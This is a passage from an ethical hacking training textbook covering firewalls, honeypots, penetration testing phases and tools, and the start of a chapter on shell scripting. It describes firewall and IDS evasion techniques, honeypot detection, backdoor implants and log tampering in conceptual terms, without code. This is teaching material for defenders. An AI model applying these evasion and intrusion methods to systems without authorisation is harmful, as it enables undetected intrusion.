regardless of the platform, program, or language, is also an effective way
to evade IDSs.98

Polymorphic code is another means to circumvent signature-based IDS

by creating unique attack patterns, so that the attack does not have a
single detectable signature.

14.4 Firewall

Access to e-mail and other Internet resources is very much a necessity

for conducting business and accessing information. However, along with
the convenience that network connectivity brings, it also raises serious
security concerns. With always-on connections such as cable modems
and DSL lines, Internet users need to be increasingly alert of security
issues, as network traffic coming into the computer can cause damage to
files and programs even when the user is away from the computer and
the computer is idle. In a system that is not protected with any security
measures, malicious code such as viruses can infect systems and cause
damage that may be difficult to repair. Unscrupulous characters on the
Internet are always snooping around trying to find open computers from
which they can steal personal files, personal information or create other
forms of mischief. The loss of financial records, e-mail, customer files,
can be devastating to a business or to an individual.

What are Firewalls?

Firewalls are tools that can be used to enhance the security of computers
connected to a network, such as a LAN or the Internet. A firewall
separates a computer from the Internet, inspecting packets of data as
they arrive at either side of the firewall Inbound to, or outbound from,
your computer to determine whether it should be allowed to pass or be
blocked.
Firewalls act as guards at the computers entry points (which are
called ports) where the computer exchanges data with other devices on
the network. Firewalls ensure that packets that are requesting
permission to enter the computer meet certain rules that are established
by the user of the computer. Firewalls operate in two ways, by either
denying or accepting all messages based on a list of designated
acceptable or unacceptable sources, or by allowing or denying all

98
http://johncrackernet.blogspot.in/2007/01/intrusion-detection-system-ids-evasion.
Copyright 2013 Intelligent Quotient System Pvt. Ltd. 208
 Ethical Hacking Part I

messages based on a list of designated acceptable or unacceptable

destination ports.

Personal computers use TCP/IP ports to communicate with other

computers. A port is a point at which computers connect to networks
and to other computers so that it can exchange information with
networks and other computers. Personal computers have various types of
ports, each of which provides a specific and unique service. Port
numbers that are open indicate which applications or services that
computer is currently running.
Each port has a specific number, and each one allows computers to
exchange information related to a specific application. For instance,
computers typically exchange information with the World Wide Web via
port 80. The port number is held in the information in the packet header.
This is important for firewalls, because by reading the packet the firewall
can tell what application the message is trying to run. Firewalls can be
configured to deny certain applications, which they determine by reading
the port number of the incoming packet.
For example, one common service is FTP, or file transfer protocol, which
allows computers to exchange large files of text and graphics. The FTP
server on a computer utilizes port 21. If the recipient computer is open to
accepting FTP packets, it will accept packets that indicate that they are
FTP packets by the inclusion of port 21 in their header. If, for instance,
the recipient computer is not running FTP, it would not be open to
receiving information that is addressed for port 21. Thus the firewall
should be configured to deny access to any packets that are destined for
that port number.
There are 65,535 virtual ports on a typical personal computer that can
be used to gain entry. The firewall has to keep an eye on each one of
these ports.

Copyright 2013 Intelligent Quotient System Pvt. Ltd. 209

 Ethical Hacking Part I

Classification of Firewalls

Firewalls have a set of rules that determines if the packet should be

allowed entry. The firewall is located at the point of entry where data
attempts to enter the computer from the Internet. But different firewalls
have different methods of inspecting packets for acceptance or rejection.
Packet Filtering
The most common firewall method is known as packet filtering. When a
packet filter firewall receives a packet from the Internet, it checks
information held in the IP Address in the header of the packet and
checks it against a table of access control rules to determine whether or
not the packet is acceptable.
In this case, a set of rules established by the firewall administrator
serves as the guest list. These rules may specify certain actions when a
particular source or destination IP address or port number is identified.
For example, access to a pornographic web site can be blocked by
designating the IP address of that site as a non-permitted connection
(incoming or outgoing) with the user’s computer. When the packet filter
firewall encounters a packet from the porn site, it examines the packet.
Since IP address of the porn site is contained in the header of the packet,
it meets the conditions that specifically deny such a connection and the
web traffic is not permitted to go through.
Although packet filters are fast, they are also relatively easy to
circumvent. One method of getting around a packet filter firewall is
known as IP spoofing, in which hackers adopt the IP address of a trusted
source, thereby fooling the firewall into thinking that the packets from
the hacker are actually from a trusted source. The second fundamental
problem with packet filter firewalls is that they allow a direct connection
between source and destination computers. As a result, once an initial
connection has been approved by the firewall, the source computer is
connected directly to the destination computer, thereby potentially
exposing the destination computer and all the computers to which it is
connected to attack.

Copyright 2013 Intelligent Quotient System Pvt. Ltd. 210

 Ethical Hacking Part I

Stateful Packet Inspection

A second method utilized by firewalls is known as stateful packet
inspection. Stateful packet inspection is a form of super-charged packet
filtering. It examines not just the headers of the packet, but also the
contents, to determine more about the packet than just its source and
destination information. It is called a stateful packet inspection because
it examines the contents of the packet to determine what the state of the
communication is. It ensures that the stated destination computer has
previously requested the current communication. This is a way of
ensuring that all communications are initiated by the recipient computer
and are taking place only with sources that are known and trusted from
previous interactions. In addition to being more rigorous in their
inspection of packets, Stateful inspection firewalls also close off ports
until connection to the specific port is requested. This allows an added
layer of protection from the threat of port scanning.
Application-Level Proxy
An application-level proxy because it determines if a connection to a
requested application is permitted. Only connections for specified
purposes, such as Internet access or e-mail, will be permitted. This
allows system administrators to control what applications their systems
computers will be used for.
For example, hackers can use the Telnet service (which in the early days
of the Internet was developed to allow remote logins to computers) to gain
unauthorized access to a network. However, a firewall can be setup to
allow only web and e-mail applications to gain access. The firewall can be
programmed to stop all packets with the destination port of 23, which is
the standard port for Telnet. Any attempt by hackers to telnet into the
user’s computer will fail because the application level firewall will
recognize this telnet connection as a non-web/e-mail application and
reject the information trying to enter the user’s computer.
This type of firewall is known as an application-level proxy because, in
addition to screening packets for the type of application they want to run
on the user’s computer, they also serve as a proxy server. A proxy can be
thought of as a computer that sits between a computer and a web server
and acts as a middleman between the computer and the web server.

Copyright 2013 Intelligent Quotient System Pvt. Ltd. 211

 Ethical Hacking Part I

An application-level proxy receives all communications requests from the

computers behind it. It then proxies the request; that is, it makes the
requests on behalf of its constituent computers. this does is to effectively
hide the individual computers on the network behind the firewall. The
targeted computers are protected from view because outside sources
never make direct contact with the computers - every communication is
conducted through the proxy server.

Network Address Translation (NAT)

Network Address Translation (NAT), serves as a firewall by keeping
individual IP addresses hidden from the outside world. Similar to a proxy
server, Network Address Translation acts as an intermediary between a
group of computers and the Internet. NAT allows an organization to
present itself to the Internet with one address. NAT converts the address
of each computer and device on a LAN into one IP address for the
Internet and vice versa. As a result, people scanning the Internet for
addresses cannot identify the computers on the network or capture any
details of their location, IP address, etc. And if the bad guys can’t find
you, they can’t hurt you.

Firewall Identification Techniques:

1. Port Scanning: The scanning engine is composed of different

modules that handle specific scanning tasks and are chained in an
intelligent way in order to avoid performing any meaningless
vulnerability checks. It only performs vulnerability detection based
on services that were discovered and properly identified.

The scanning engine performs scans in a very dynamic manner to

optimize speed and performance. The second test is to check if the
host is behind any firewalling/filtering device. This test enables the
scanner to gather more information about the network
infrastructure and will help during the scan of TCP and UDP ports.
The kind of response received indicates whether the port is used
and can therefore be probed further for weakness. Some firewalls
will uniquely identify themselves using simple port scans. e.g.
Check Point’s Firewall-1 listens on TCP ports 256,257,258 and 259
and Microsoft Proxy Server usually listens on TCP port 1080 and
1745.

Copyright 2013 Intelligent Quotient System Pvt. Ltd. 212

 Ethical Hacking Part I

2. Firewalking: The firewalking methodology is based on determining

what traffic types are allowed and then using those packet types as
the basis for further traceroute type scanning. A common firewall
implementation might be to only allow DNS queries (UDP port 53).
Thus, if we can send traffic to UDP port 53 with the next TTL value
it will pass through the initial firewall and return information
about the next host in line99.

So, it is technique for testing the vulnerability of a firewall and

mapping the routers of network that are behind firewall.

3. Banner Grabbing: Banner grabbing is a form of enumeration that

obtains banner information transmitted by services such as Telnet
and FTP. It is a simple method of OS detection that helps in
detecting services run by firewalls. 100

14.5 Firewall Evasion techniques

Whether gathering information or launching an attack, it is generally

expected that the attacker avoids detection. Although some IP address
and port scans are blatant and easily detectable, wilier attackers use a
variety of means to conceal their activity. Techniques such as using FIN
scans instead of SYN scans—which attackers know most firewalls and
intrusion detection programs detect—indicate an evolution of
reconnaissance and exploit techniques to evade detection and
successfully accomplish their tasks.

i. FIN Scan: A FIN scan sends TCP segments with the FIN flag set
in an attempt to provoke a response a TCP segment with the
RST flag set and thereby discovers an active host or an active
port on a host. Attackers might use this approach rather than
perform an address sweep with ICMP echo requests or an
address scan with SYN segments because they know that many
firewalls typically guard against the latter two approaches—but
not necessarily against FIN segments. The use of TCP segments

99
http://www.giac.org/paper/gsec/312/firewalk-attackers-firewall/100588
100
http://books.google.co.in/books?id=m2qZNW4dcyIC&pg=PA455&lpg=PA455&dq
Copyright 2013 Intelligent Quotient System Pvt. Ltd. 213
 Ethical Hacking Part I

with the FIN flag set might evade detection and thereby help the
attackers succeed in their reconnaissance efforts.

ii. IP Address Spoofing: IP address spoofing is one effective

method to bypass the firewall. The users gain an unauthorized
access to a computer or a network by making it appear that the
message comes from a trusted machine by “spoofing” the IP
address of that machine. To completely understand how it
works, we should review the structure of the TCP/IP protocol
suite. A basic understanding of these headers and network
exchanges is essential to the whole process. Internet protocol
(IP) is a network protocol operating at the network layer of the
OSI model. This protocol is connectionless and has no
information regarding transaction state, which is used to route
data packets on a network.

iii. Source Routing: Source routing is another method to bypass

the firewall and the packets sender can designate the route that
a packet should take through the network. When these packets
travel among the nodes in the network, each router will check
IP address of the destination in these packets and choose the
next node to forward them. In source routing, the sender makes
some or all of these decisions on the router.

iv. Tiny Fragments: The way of tiny fragments is also an effective

method to bypass the firewall and in this means, the user uses
the IP fragmentation to create extremely small fragments and
force the TCP header information into separated packet
fragments. This way is designed to bypass the filtering rules
that depend on TCP header information. The users hope that
only the first fragment is examined by the filtering router and
the remaining fragments are passed through.

14.5 Honeypot

A honeypot is a computer system on the Internet that is expressly set up

to attract and "trap" people who attempt to attack other people's
computer systems.

Honeypots are designed to mimic systems that an intruder would like to

break into but limit the intruder from having access to an entire network.

Copyright 2013 Intelligent Quotient System Pvt. Ltd. 214

 Ethical Hacking Part I

If a honeypot is successful, the intruder will have no idea that she/he is

being tricked and monitored.
Most honeypots are installed inside firewalls so that they can better be
controlled, though it is possible to install them outside of firewalls. A
firewall in a honeypot works in the opposite way that a normal firewall
works: instead of restricting what comes into a system from the Internet,
the honeypot firewall allows all traffic to come in from the Internet and
restricts what the system sends back out.
A honeypot consists of a single computer that appears to be part of a
network, but is actually isolated and protected. Honeypots can be more
than one computer, it is called honey net.

By luring a hacker into a system, a honeypot serves several purposes:

 The administrator can watch the hacker exploit the vulnerabilities

of the system, thereby learning where the system has weaknesses
that need to be redesigned.
 The hacker can be caught and stopped while trying to obtain root
access to the system.
 By studying the activities of hackers, designers can better create
more secure systems that are potentially invulnerable to future
hack101

102

101
http://www.webopedia.com/TERM/H/honeypot.html
102

http://www.google.co.in/imgres?q=detecting+honeypots+and+other+suspicious+environments&um=1&h
l=en&sa=N&tbo=d&biw=1366&bih=643&tbm=isch&tbnid=JITUc93yktK-
Copyright 2013 Intelligent Quotient System Pvt. Ltd. 215
 Ethical Hacking Part I

Although most honeypots have a similar general purpose, there are

actually different types of honeypots that fulfill different
functions. 103 There are following types of honeypots:

Low Interaction Honeypots

Low Interaction Honeypots allow only limited interaction for an attacker

or malware. All services offered by a Low Interaction
Honeypots are emulated. Thus Low Interaction Honeypots are not
themselves vulnerable and will not become infected by the
exploit attempted against the emulated vulnerability.

E.g. Specter, Honeyed, and KFSensor

High Interaction Honeypots

High Interaction Honeypots make use of the actual vulnerable service or

software. High-interaction honeypots are usually complex solutions as
they involve real operating systems and applications. In High
Interaction Honeypots nothing is emulated everything is real. High
Interaction Honeypots provide a far more detailed picture of how an
attack or intrusion progresses or how a particular malware execute in
real-time. Since there is no emulated service, High
Interaction Honeypots helps in identifying unknown vulnerabilities. But
High Interaction Honeypots are more prone to infections and High
Interaction Honeypots increases the risk because attackers can use these
real honeypot operating systems to attack and compromise production
systems.

E.g.: Symantec Decoy Server and Honetnets.104

Detecting Honeypots:

Attackers can determine the presence of honeypots by probing the

services running on the system. Attackers craft malicious probe packets
to scan for services such as HTTP over SSL (HTTPS), SMTP over SSL
(SMTPS), and IMAP over SSL (IMAPS) .Ports that shows a particular
services running but deny a three-way handshake connection indicate
103
http://ethics.csc.ncsu.edu/abuse/hacking/honeypots/study.php
104
http://www.omnisecu.com/security/infrastructure-and-email-security/low-interaction-honeypots-and-
high-interaction-honeypots.htm
Copyright 2013 Intelligent Quotient System Pvt. Ltd. 216
 Ethical Hacking Part I

the presence of a honeypot. Some of the tools that can be used probe
honeypots include:

 Send-safe Honeypot: It is a tool designed for checking lists of


HTTPS and SOCKS proxies for so-called Honeypots.
Nessus Security Scanner: The Nessus Security Scanner has ability
to test SSLized services such as https, smtps, and more. Nessus
can be provided with a certificate so that it can be integrated into a
PKI-fied environment.

14.6 Countermeasures:

Countermeasures for corporate end-users or home pc users:



The desktop Anti-Virus (AV) signature must be kept up-to-date.
Don’t open attachments unless you are sure of its authenticity.


Make sure the system is updated with the latest security patches.


If possible install a desktop based firewall
Always do a virus scan for any external drives when attached to


the system
Never download any free tools if you are not sure of its


authenticity.
Always stay tuned with latest virus alerts or outbreaks.

Countermeasures for corporate security administrators:

 The AV gateway must have the entire signature up-to-date to be


pushed into its client PCs.


A content filter at the SMTP gateway is always advisable.
Desktops attached to the corporate network must be installed with


latest security patches.
There must be a patch management system like (SMS or SUS) in
place and the systems must be updated with the latest security


patches.
Conduct anti-virus schedule scan on all the desktops attached to


the corporate network
IDS if installed would be a great device to keep you alerted about
any attacks in the network but it would be really helpful if an IPS


can be afforded.
Big organization that has huge amount of network devices and
servers to manage must use Security Information Management
Copyright 2013 Intelligent Quotient System Pvt. Ltd. 217
 Ethical Hacking Part I

(SIM) systems like NetIQ, Arc Sight or Net Forensic etc. This makes
the job easy for a security administrator to monitor huge networks


for any kind of security alerts.
Security should not be confined to just perimeter level but rather it
should also be considered seriously at the desktop level which are


attached to the corporate network.
Conduct end-users training to make them aware of various risks


related to virus or worms attacks.
Last but not the least always stay tuned with latest virus alerts or
outbreaks

Copyright 2013 Intelligent Quotient System Pvt. Ltd. 218

 Ethical Hacking Part I

CHAPTER 15
Penetration Testing

15.1 Introduction to Penetration Testing

15.2 Security Assessments
15.3 Types of Penetration Testing
15.4 Penetration Testing Techniques
15.5 Penetration Testing Phases
15.6 List the Automated Penetration Testing Tools

15.1 Introduction

105

A penetration test is a proactive and authorized attempt to evaluate the

security of an IT infrastructure by safely attempting to exploit system
vulnerabilities, including OS, service and application flaws, improper
configurations, and even risky end-user behavior. Such assessments are
also useful in validating the efficacy of defensive mechanisms, as well as
end-users’ adherence to security policies.

Tests are typically performed using manual or automated technologies to

systematically compromise servers, endpoints, web applications, wireless
networks, network devices, mobile devices and other potential points of
exposure.

Information about any security vulnerabilities successfully exploited

through penetration testing is typically aggregated and presented to IT
and network systems managers to help those professionals make

105
https://megaplanit.com/files/1813/4828/0143/penetration-testing-landing-206.jpg
Copyright 2013 Intelligent Quotient System Pvt. Ltd. 219
 Ethical Hacking Part I

strategic conclusions and prioritize related remediation efforts. The

fundamental purpose of penetration testing is to measure the feasibility
of systems or end-user compromise and evaluate any related
consequences such incidents may have on the involved resources or
operations.106

15.2 Security Assessments

Every organization uses different types of security assessments to

validate the level of security on its network resources.
Basically Security Assessment categorizes in two ways according to their
function.

A) Penetration Testing
B) Security Audits
C) Vulnerability Assessment

A Penetration tester assesses the security posture of the organization

as a whole to reveal the potential consequences of a real attacker
compromising a network or application. Security assessments can be
categorized as security audits, vulnerability assessments, or penetration
testing. Each security assessment requires that the people conducting
the assessment have different skills based on the scope of the
assessment.

A Security Audit and a vulnerability assessment scan IP networks and

hosts for known security weaknesses with tools designed to locate live
systems, enumerate users, and identify operating systems and
applications, looking for common security configuration mistakes and
vulnerabilities.

A vulnerability Assessment only identifies the potential vulnerabilities

while a pen test actually tries to gain access to the network. An example
of a security assessment is looking at a door and thinking if that door is
unlocked it could allow someone to gain unauthorized access, whereas a
pen test actually tries to open the door to see where it leads.

106
http://www.coresecurity.com/content/what-is-pen-test
Copyright 2013 Intelligent Quotient System Pvt. Ltd. 220
 Ethical Hacking Part I

Penetration testing also called pen testing is the practice of testing a

computer system, network or Web application to find vulnerabilities that
an attacker could exploit.

A pen test is usually a better indication of the weaknesses of the network

or systems but is more invasive and therefore had more potential to
cause disruption to network service.

Difference between network Vulnerability assessment and

Penetration test.107

 Vulnerability Analysis is the process of identifying vulnerabilities

on a network, whereas a Penetration Testing is focused on actually
gaining unauthorized access to the tested systems and using that
access to the network or data, as directed by the client.

 A Vulnerability Analysis provides an overview of the flaws that

exist on the system while a Penetration Testing goes on to provide
an impact analysis of the flaws identifies the possible impact of the
flaw on the underlying network, operating system, database etc.

 Vulnerability Analysis is more of a passive process. In Vulnerability

Analysis you use software tools that analyze both network traffic
and systems to identify any exposures that increase vulnerability
to attacks. Penetration Testing is an active practice wherein ethical
hackers are employed to simulate an attack and test the network
and systems’ resistance.

 Vulnerability Analysis deals with potential risks, whereas

Penetration Testing is actual proof of concept. Vulnerability
Analysis is just a process of identifying and quantifying the
security Vulnerabilities in a system. Vulnerability Analysis doesn’t
provide validation of Security Vulnerabilities. Validation can be
only done by Penetration testing.

107
http://www.ivizsecurity.com/blog/penetration-testing/
Copyright 2013 Intelligent Quotient System Pvt. Ltd. 221
 Ethical Hacking Part I

 The scope of a Penetration Testing can vary from a Vulnerability

Analysis to fully exploiting the targets to destructive testing.
Penetration Testing consists of a Vulnerability Analysis, but it goes
one step ahead where in you will be evaluating the security of the
system by simulating an attack usually done by a Malicious
Hacker.
 For instance a Vulnerability Analysis exercise might identify
absence of anti-virus software on the system or open ports as a
vulnerability. The Penetration Testing will determine the level to
which existing vulnerabilities can be exploited and the damage that
can be inflicted due to this.

 A Vulnerability Analysis answers the question: “What are the

present Vulnerabilities and how do we fix them?” A Penetration
Testing simply answers the questions: “Can any External Attacker
or Internal Intruder break-in and what can they attain?”

Penetration Testing

A penetration test simulates methods that intruders use to gain

unauthorized access to an organization’s network and systems and to
compromise them. The purpose of a penetration test is to test the
security implementations and security policy of an organization: basically
to see if the organization has implemented security measures as specified
in the security policy.

A hacker whose intent is to gain unauthorized access to an

organization’s network is very different from a professional penetration
tester who lacks malice and intent and uses their skills to improve an
organization’s network security without causing a loss of service or a
disruption to the business.
Pen tests can be automated with software applications or they can be
performed manually. Either way, the process includes gathering
information about the target before the test (reconnaissance), identifying
possible entry points, attempting to break in (either virtually or for real)
and reporting back the findings.

The main objective of penetration testing is to determine security

weaknesses. A pen test can also be used to test an organization's
security policy compliance, its employees' security awareness and the
organization's ability to identify and respond to security incidents.

Copyright 2013 Intelligent Quotient System Pvt. Ltd. 222

 Ethical Hacking Part I

Why conduct a penetration test?

From a business perspective, penetration testing helps safeguard your

organization against failure, through:

 Preventing financial loss through fraud (hackers, extortionists and

disgruntled employees) or through lost revenue due to unreliable
business systems and processes.

 Proving due diligence and compliance to your industry regulators,

customers and shareholders. Non-compliance can result in your
organization losing business, receiving heavy fines, gathering bad
PR or ultimately failing. At a personal level it can also mean the
loss of your job, prosecution and sometimes even imprisonment.

 Protecting your brand by avoiding loss of consumer confidence and

business reputation.

 Identifying vulnerabilities and quantifying their impact and

likelihood so that they can be managed proactively; budget can be
allocated and corrective measures implemented.

15.3 Types of Penetration Testing

There are two types of penetration:

1. Internal: This testing is often performed from different network

access points that include both the physical and logical segments; this
provides a more detailed view of the security.

2. External: This testing has its focus on the infrastructure

components, servers, and the related software of the target. It also
provides a detailed analysis of the information that is available from
public sources, such as the Internet. Enumeration of the network is
also performed and analyzed. The filtering devices, such as firewalls and
routers, are also scrutinized for their vulnerabilities. Finally, the impact
and consequences are accessed.

The two types of penetration have three variations, each depending on

the degree of knowledge provided by the target company to the pen
testing team.

Copyright 2013 Intelligent Quotient System Pvt. Ltd. 223

 Ethical Hacking Part I

• Black box: This testing does not provide the tester with any
information and therefore is a much better testing method because
crackers and script kiddies normally do not have any information that
is directly obtained from the target company and need to gather their
information from public sources. It simulates real-world attack
scenarios. The steps of mapping the network, enumerating shares and
services, and operating system fingerprinting are typical for black box
testing.

• White box: For this, related information is provided and is done so to

assess the security against specific attacks or specific targets. This is
the chosen method when the company needs to get a complete audit of
its security.

• Grey box: In this testing, some knowledge is provided to the testers

but this testing puts the tester in a privileged position. This would
normally be a preferred method when cost is a factor as it saves time for
the pen testing team to uncover information that is publicly available.
Also, this approach would be suitable when the organization needs to
obtain knowledge of the security assessment practices.108

Methods of Penetration

You have two choices when it comes to getting penetration done.

• Automatic: The automatic penetration is often chosen when cost is a

key factor. Due to the free software availability of many penetration
tools, a company could choose to have the penetration performed by
this method. Also, commercial tools that could be used have a cost
associated with them; however, this tool cost could be spread out and
would still be a less costly solution than manual penetration.

However, the learning curve for each penetration tool is usually much
higher, and the knowledge required and experience in doing such work
demands the skills of an expert.

• Manual: Manual penetration is usually chosen to give an independent

assessment of the penetration. Normally an external company that is
experienced in the field and does it on a regular basis, with a good track
record, is chosen. Regulation requirements could make this the only
alternative a company has.
108
http://www.giac.org/cissp-papers/197.pdf
Copyright 2013 Intelligent Quotient System Pvt. Ltd. 224
 Ethical Hacking Part I

15.4 Penetration Testing Techniques

Network services test: This is one of the most common types of

penetration tests, and involves finding target systems on the network,
searching for openings in their base operating systems and available
network services, and then exploiting them remotely. Some of these
network service penetration tests take place remotely across the Internet,
targeting the organization’s perimeter networks. Others are launched
locally, from the target’s own business facilities, to assess the security of
their internal network or the DMZ from within, seeing what kinds of
vulnerabilities an internal user could learn.

Client-side test: This kind of penetration test is intended to find

vulnerabilities in and exploit client-side software, such as web browsers,
media players, document editing programs, etc.

Web application test: These penetration tests look for security

vulnerabilities in the web-based applications and programs deployed and
installed on the target environment.

Remote dial-up war dial: These penetration tests look for modems in a
target environment, and normally involve password guessing or brute
forcing to login to systems connected to discovered modems.

Wireless security test: These penetration tests involve discovering a

target’s physical environment to find unauthorized wireless access points
or authorized wireless access points with security weaknesses.

Social engineering test: This type of penetration test involves

attempting to make a user into revealing sensitive information such as a
password or any other sensitive data. These tests are often conducted
over the phone, targeting selected help desks, users or employees,
evaluating processes, procedures, and user awareness.

Copyright 2013 Intelligent Quotient System Pvt. Ltd. 225

 Ethical Hacking Part I

15.5 Penetration Testing Phase

Penetration testing includes three phases:109

1. PRE-ATTACK PHASE
2. ATTACK PHASE
3. POST-ATTACK PHASE

1. Pre - Attack Phase

The pre-attack phase involves reconnaissance or data gathering. It

consist of two phases are passive and active reconnaissance.

PASSIVE RECONNAISSANCE:

This phase provides all the foot- printing information, such as physical
and logical locations, analog connections, and company contact
information.

It consists of the following activities: directory mapping (web, ftp),

competitive intelligence gathering, asset classification (determining
asset value of infrastructure that is interfacing with the web),
obtaining registration information, product/services offered (finding
out the product ranges and services offered by the target company that
are available online), document sifting (the gathering of information
only from published material), and social engineering.

The pen test involves locating the IP block and using domain name
‘Whois’ to find personnel contact information, as well as enumerating
information about hosts that can then be used to create a detailed
network diagram and identify targets.

ACTIVE RECONNAISSANCE:

This phase attempts to profile and map the Internet profile of the
organization. A few of the activities involved are network mapping,
perimeter mapping, web profiling, operating system and service
identification obtained through OS fingerprinting and port scans.

109
http://www.giac.org/cissp-papers
Copyright 2013 Intelligent Quotient System Pvt. Ltd. 226
 Ethical Hacking Part I

2. Attack Phase

Next is the attack phase, and during the attack phase tools can range
from exploitive to responsive. They’re used by professional hackers to
monitor and test the security of systems and the network. These
activities include but aren’t limited to:

i. Penetrating the perimeter

This includes looking at error reports, checking Access Control

Lists by forging responses with crafted packets, and evaluating
protocol filtering rules by using various protocols such as SSH,
FTP, and Telnet. The tester should also test for buffer overflows,
SQL injections, bad input validation, output sanitization, and DoS
attacks. In addition to software testing, you should allocate time to
test internal web applications and wireless configurations, because
the insider threat is the greatest security threat today.

ii. Acquiring the target

This set of activities is more intrusive and challenging than a
vulnerability scan or audit. You can use an automated exploit tool
like CORE IMPACT or attempt to access the system through
legitimate information obtained from social engineering. This
activity also includes testing the enforcement of the security policy,
brute-force password crackers, or the use of get admin tools to
gain greater access to protected resources.

iii. Escalating privileges

Once a user account has been acquired the tester can attempt to
give the user account more privileges or rights to systems on the
network. Many hacking tools are able to exploit vulnerability in a
system and create a new user account with administrator
privileges.

iv. Gaining Access: It is at this stage that the penetration tester

exploits the vulnerability by executing the code of choice such as
getting a command shell. After access is gained, it is common to
upload root kits or implant programs that provide backdoor
Copyright 2013 Intelligent Quotient System Pvt. Ltd. 227
 Ethical Hacking Part I

access. Having the target connecting to the attacker’s machine is

often a desired solution by attackers. Following this, the attacker
needs to cover his tracks by manipulating the audit logs. The main
goal here is to explore the extent to which security defenses fail.

v. Executing, implanting, and retracting

This is the final phase of testing. Your hacking skills are
challenged by escalating privileges on a system or network while
not disrupting business processes. Leaving a mark can show where
you were able to gain greater access to protected resources. Many
companies don’t want you to leave marks or execute arbitrary
code, and such limitations are identified and agreed upon prior to
starting your test.

3. Post - Attack Phase

The post-attack phase involves restoring the system to normal pre-test

configurations, which includes removing files, cleaning registry entries if
vulnerabilities were created, and removing shares and connections.

Finally, you analyze all the results and presenting them in a

comprehensive report and a report for management. These reports
include your objectives, your observations, all activities undertaken, and
the results of test activities, and may recommend fixes for vulnerabilities.

Penetration Testing Deliverables: These include a detailed report of all

incidents that occurred, and all activities carried out, during the testing.
A description of the observations during testing is provided, as are the
objectives and recommend corrective measures as agreed upon in the
rules of engagement.

Copyright 2013 Intelligent Quotient System Pvt. Ltd. 228

 Ethical Hacking Part I

Pen-Test Report

The main deliverable at the end of a penetration test is the pen testing
report. The report should include the following:



List of your findings, in order of highest risk


Analysis of your findings


Conclusion or explanation of your findings


Remediation measures for your findings
Log files from tools that provide supporting evidence of your


findings
Executive summary of the organization’s security posture


Name of the tester and the date testing occurred
Any positive findings or good security implementations

Validation of Penetration: This is the final step after penetration testing

is accomplished. You now have a documented report with the actual
validation of each asset value that would be lost in regards to a breach of
your security defenses. The validation report also defines to what degree
the penetration was successful, and unsuccessful. Recommendations are
provided to secure those components that did not pass the test or meet
to a certain degree, as required by regulations or security policy.
Validation establishes the worth of penetration testing for its defensive
measures in the entire environment. It is an independent validation of
evaluating the results obtained from the penetrating testing to ensure
that the results are conclusive. Recommendations that need to be
implemented are also in this report. A gap analysis is now performed that
shows the difference between where the organization is today, relative to
where it would like to be.110

110
http://www.giac.org/cissp-papers
Copyright 2013 Intelligent Quotient System Pvt. Ltd. 229
 Ethical Hacking Part I

15.6 List the Automated Penetration Testing Tools

i. Nessus
This freeware network vulnerability scanner has more than 11,000
plug-ins available. It includes remote and local security checks,
client/server architecture with a GTK graphical interface, and an
embedded scripting language for writing your own plug-ins or
understanding the existing ones.

ii. GFI LANguard

This is a commercial network security scanner for Windows. It
scans IP networks to detect what machines are running. It can
determine the host operating system, what applications are
running, what Windows service packs are installed, whether any
security patches are missing, and more.

iii. Retina
This is a commercial vulnerability assessment scanner by eEye.
Like Nessus, Retina scans all the hosts on a network and reports
on any vulnerability found.

iv. CORE IMPACT

CORE IMPACT is an automated pen testing product that is widely
considered to be the most powerful exploitation tool available. It
has a large, regularly updated database of professional exploits.
Among its features, it can exploit one machine and then establish
an encrypted tunnel through that machine to reach and exploit
other machines.

v. ISS Internet Scanner

This is an application-level vulnerability assessment. Internet
Scanner can identify more than 1,300 types of networked devices
on your network, including desktops, servers, routers/switches,
firewalls, security devices, and application routers.

vi. X-Scan
X-Scan is a general multithreaded plug-in-supported network
vulnerability scanner. It can detect service types, remote operating
system types and versions, and weak usernames and passwords.

vii. SARA

Copyright 2013 Intelligent Quotient System Pvt. Ltd. 230

 Ethical Hacking Part I

Security Auditor’s Research Assistant (SARA) is a vulnerability

assessment tool derived from the System Administrator Tool for
Analyzing Networks (SATAN) scanner. Updates are typically
released twice a month.

viii. QualysGuard
This is a web-based vulnerability scanner. Users can securely
access Qualys- Guard through an easy-to-use web interface. It
features more than 5,000 vulnerability checks, as well as an
inference-based scanning engine.

ix. SAINT
Security Administrator’s Integrated Network Tool (SAINT) is a
commercial vulnerability assessment tool.

x. MBSA
Microsoft Baseline Security Analyzer (MBSA) is built on the
Windows Update Agent and Microsoft Update infrastructure. It
ensures consistency with other Microsoft products and, on
average, scans more than 3 million computers each week

xi. Metasploit Framework

This is an open-source software product used to develop, test, and
use exploit code.

xii. Canvas
Canvas is a commercial vulnerability exploitation tool. It includes
more than150 exploits.

Copyright 2013 Intelligent Quotient System Pvt. Ltd. 231

 Ethical Hacking Part I

CHAPTER 16
Shell Scripting
Objective
16.1 Introduction
16.2 Shell Introduction
16.3 Scripting Introduction
16.4 Shell Scripting
16.5 Importance of Shell Script
16.6 Capabilities of Shell Script
16.7 Shell Script Example

16.1 Introduction
Time is precious. It is just waste of time typing a frequently used
sequence of commands at a command prompt, more especially if they are
abnormally long or complex. Scripting is a way by which one can improve
this necessity by automating these command sequences in order to make
life at the shell easier and more productive..111

You can think of a scripting platform as an environment in which a

script can run. Given that a script is nothing more than a collection of
text, there has to be some means for the computer on which the script is
running to understand that text and carry out its instructions.

Being a Linux user means you play around with the command-line, there
are just some things that are done much more easily via this interface
than by pointing and clicking. The more you use and learn the
command-line, the more you see it’s potential. Well, the command-line
itself is a program: the shell.

Now, some of you who used Windows before using Linux may remember
batch files. These were little text files that you could fill with commands
to execute and Windows would run them in turn. It was a clever and
neat way to get some things done, like run games in your high school
computer lab when you couldn’t open system folders or create shortcuts.
111
http://www.csie.ntu.edu.tw/~r92092/ref/win32/win32scripting.html#Win32Scripting-Introduction
Copyright 2013 Intelligent Quotient System Pvt. Ltd. 232
 Ethical Hacking Part I

Batch files in Windows, while useful, are a cheap imitation of shell

scripts.112

16.2 What is Shell?

In computing, a shell is a piece of software that essentially provides a
kind of interface for end-users. Typically, the term refers to an operating
system shell which provides access to the services of a kernel. However,
the term is also applied very loosely to applications and may include any
software that is "built around" a particular component, such as web
browsers and email clients that are "shells" for HTML rendering engines.
The name 'shell' originates from shells being an outer layer of interface
between the user and the innards of the operating system (the kernel).
Operating system shells generally fall into one of two categories:
command line and graphical. Command line shells provide a command
line interface (CLI) to the operating system, while graphical shells provide
a graphical user interface (GUI).
A shell is a place where you can write commands to be executed. If you
are running a Windows OS, a shell is like the command prompt.
(Start/All Programs/Accessories/Command Prompt). On a shell you can
see your files with the command "ls" (short for "list"), you can change
